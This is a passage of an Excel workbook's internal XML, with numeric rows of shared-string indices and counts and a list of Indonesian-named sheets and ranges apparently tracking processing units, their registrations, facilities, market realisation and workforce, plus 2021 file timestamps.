        <v>16220</v>
      </c>
      <c r="C23219">
        <v>1</v>
      </c>
      <c r="D23219">
        <v>430</v>
      </c>
    </row>
    <row r="23220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23220" t="s">
        <v>16229</v>
      </c>
      <c r="B23220" t="s">
        <v>16221</v>
      </c>
      <c r="C23220">
        <v>68</v>
      </c>
      <c r="D23220">
        <v>430</v>
      </c>
    </row>
    <row r="23221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23221" t="s">
        <v>16230</v>
      </c>
      <c r="B23221" t="s">
        <v>16222</v>
      </c>
      <c r="C23221">
        <v>103</v>
      </c>
      <c r="D23221">
        <v>430</v>
      </c>
    </row>
    <row r="23222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23222" t="s">
        <v>16228</v>
      </c>
      <c r="B23222" t="s">
        <v>16211</v>
      </c>
      <c r="C23222">
        <v>0</v>
      </c>
      <c r="D23222">
        <v>1867</v>
      </c>
    </row>
    <row r="23223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23223" t="s">
        <v>16231</v>
      </c>
      <c r="B23223" t="s">
        <v>16212</v>
      </c>
      <c r="C23223">
        <v>0</v>
      </c>
      <c r="D23223">
        <v>1867</v>
      </c>
    </row>
    <row r="23224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23224" t="s">
        <v>16228</v>
      </c>
      <c r="B23224" t="s">
        <v>16213</v>
      </c>
      <c r="C23224">
        <v>0</v>
      </c>
      <c r="D23224">
        <v>1867</v>
      </c>
    </row>
    <row r="23225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23225" t="s">
        <v>16231</v>
      </c>
      <c r="B23225" t="s">
        <v>16214</v>
      </c>
      <c r="C23225">
        <v>0</v>
      </c>
      <c r="D23225">
        <v>1867</v>
      </c>
    </row>
    <row r="23226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23226" t="s">
        <v>16228</v>
      </c>
      <c r="B23226" t="s">
        <v>16215</v>
      </c>
      <c r="C23226">
        <v>0</v>
      </c>
      <c r="D23226">
        <v>1867</v>
      </c>
    </row>
    <row r="23227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23227" t="s">
        <v>16231</v>
      </c>
      <c r="B23227" t="s">
        <v>16216</v>
      </c>
      <c r="C23227">
        <v>1</v>
      </c>
      <c r="D23227">
        <v>1867</v>
      </c>
    </row>
    <row r="23228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23228" t="s">
        <v>16228</v>
      </c>
      <c r="B23228" t="s">
        <v>16217</v>
      </c>
      <c r="C23228">
        <v>1</v>
      </c>
      <c r="D23228">
        <v>1867</v>
      </c>
    </row>
    <row r="23229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23229" t="s">
        <v>16231</v>
      </c>
      <c r="B23229" t="s">
        <v>16218</v>
      </c>
      <c r="C23229">
        <v>1</v>
      </c>
      <c r="D23229">
        <v>1867</v>
      </c>
    </row>
    <row r="23230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23230" t="s">
        <v>16229</v>
      </c>
      <c r="B23230" t="s">
        <v>16219</v>
      </c>
      <c r="C23230">
        <v>0</v>
      </c>
      <c r="D23230">
        <v>1867</v>
      </c>
    </row>
    <row r="23231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23231" t="s">
        <v>16230</v>
      </c>
      <c r="B23231" t="s">
        <v>16220</v>
      </c>
      <c r="C23231">
        <v>0</v>
      </c>
      <c r="D23231">
        <v>1867</v>
      </c>
    </row>
    <row r="23232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23232" t="s">
        <v>16229</v>
      </c>
      <c r="B23232" t="s">
        <v>16221</v>
      </c>
      <c r="C23232">
        <v>0</v>
      </c>
      <c r="D23232">
        <v>1867</v>
      </c>
    </row>
    <row r="23233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23233" t="s">
        <v>16230</v>
      </c>
      <c r="B23233" t="s">
        <v>16222</v>
      </c>
      <c r="C23233">
        <v>3</v>
      </c>
      <c r="D23233">
        <v>1867</v>
      </c>
    </row>
    <row r="23234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23234" t="s">
        <v>16223</v>
      </c>
      <c r="B23234" t="s">
        <v>16223</v>
      </c>
      <c r="C23234">
        <v>16</v>
      </c>
      <c r="D23234">
        <v>1867</v>
      </c>
    </row>
    <row r="23235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23235" t="s">
        <v>16224</v>
      </c>
      <c r="B23235" t="s">
        <v>16224</v>
      </c>
      <c r="C23235">
        <v>1</v>
      </c>
      <c r="D23235">
        <v>1867</v>
      </c>
    </row>
    <row r="23236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23236" t="s">
        <v>16228</v>
      </c>
      <c r="B23236" t="s">
        <v>16211</v>
      </c>
      <c r="C23236">
        <v>0</v>
      </c>
      <c r="D23236">
        <v>5612</v>
      </c>
    </row>
    <row r="23237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23237" t="s">
        <v>16231</v>
      </c>
      <c r="B23237" t="s">
        <v>16212</v>
      </c>
      <c r="C23237">
        <v>0</v>
      </c>
      <c r="D23237">
        <v>5612</v>
      </c>
    </row>
    <row r="23238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23238" t="s">
        <v>16228</v>
      </c>
      <c r="B23238" t="s">
        <v>16213</v>
      </c>
      <c r="C23238">
        <v>0</v>
      </c>
      <c r="D23238">
        <v>5612</v>
      </c>
    </row>
    <row r="23239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23239" t="s">
        <v>16231</v>
      </c>
      <c r="B23239" t="s">
        <v>16214</v>
      </c>
      <c r="C23239">
        <v>0</v>
      </c>
      <c r="D23239">
        <v>5612</v>
      </c>
    </row>
    <row r="23240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23240" t="s">
        <v>16228</v>
      </c>
      <c r="B23240" t="s">
        <v>16215</v>
      </c>
      <c r="C23240">
        <v>1</v>
      </c>
      <c r="D23240">
        <v>5612</v>
      </c>
    </row>
    <row r="23241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23241" t="s">
        <v>16231</v>
      </c>
      <c r="B23241" t="s">
        <v>16216</v>
      </c>
      <c r="C23241">
        <v>0</v>
      </c>
      <c r="D23241">
        <v>5612</v>
      </c>
    </row>
    <row r="23242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23242" t="s">
        <v>16228</v>
      </c>
      <c r="B23242" t="s">
        <v>16217</v>
      </c>
      <c r="C23242">
        <v>1</v>
      </c>
      <c r="D23242">
        <v>5612</v>
      </c>
    </row>
    <row r="23243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23243" t="s">
        <v>16231</v>
      </c>
      <c r="B23243" t="s">
        <v>16218</v>
      </c>
      <c r="C23243">
        <v>0</v>
      </c>
      <c r="D23243">
        <v>5612</v>
      </c>
    </row>
    <row r="23244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23244" t="s">
        <v>16229</v>
      </c>
      <c r="B23244" t="s">
        <v>16219</v>
      </c>
      <c r="C23244">
        <v>0</v>
      </c>
      <c r="D23244">
        <v>5612</v>
      </c>
    </row>
    <row r="23245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23245" t="s">
        <v>16230</v>
      </c>
      <c r="B23245" t="s">
        <v>16220</v>
      </c>
      <c r="C23245">
        <v>0</v>
      </c>
      <c r="D23245">
        <v>5612</v>
      </c>
    </row>
    <row r="23246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23246" t="s">
        <v>16229</v>
      </c>
      <c r="B23246" t="s">
        <v>16221</v>
      </c>
      <c r="C23246">
        <v>2</v>
      </c>
      <c r="D23246">
        <v>5612</v>
      </c>
    </row>
    <row r="23247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23247" t="s">
        <v>16230</v>
      </c>
      <c r="B23247" t="s">
        <v>16222</v>
      </c>
      <c r="C23247">
        <v>0</v>
      </c>
      <c r="D23247">
        <v>5612</v>
      </c>
    </row>
    <row r="23248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23248" t="s">
        <v>16223</v>
      </c>
      <c r="B23248" t="s">
        <v>16223</v>
      </c>
      <c r="C23248">
        <v>26</v>
      </c>
      <c r="D23248">
        <v>5612</v>
      </c>
    </row>
    <row r="23249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23249" t="s">
        <v>16224</v>
      </c>
      <c r="B23249" t="s">
        <v>16224</v>
      </c>
      <c r="C23249">
        <v>1</v>
      </c>
      <c r="D23249">
        <v>5612</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:D23249" xr:uid="{17A5EF93-1888-D841-B622-F595322004A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Sheet1</vt:lpstr>
      <vt:lpstr>realisasi per tahun</vt:lpstr>
      <vt:lpstr>Sheet2</vt:lpstr>
      <vt:lpstr>Sheet6</vt:lpstr>
      <vt:lpstr>Sheet3</vt:lpstr>
      <vt:lpstr>Sheet7</vt:lpstr>
      <vt:lpstr>Sheet5</vt:lpstr>
      <vt:lpstr>Sheet4</vt:lpstr>
      <vt:lpstr>Sheet3!upi_nib_npwp</vt:lpstr>
      <vt:lpstr>Sheet1!upi_plus_sarpras</vt:lpstr>
      <vt:lpstr>Sheet2!upi_realisasi_pasar</vt:lpstr>
      <vt:lpstr>Sheet4!upi_tenagakerja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2021-07-06T00:09:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-06T01:37:30Z</dcterms:modified>
</cp:coreProperties>
</file>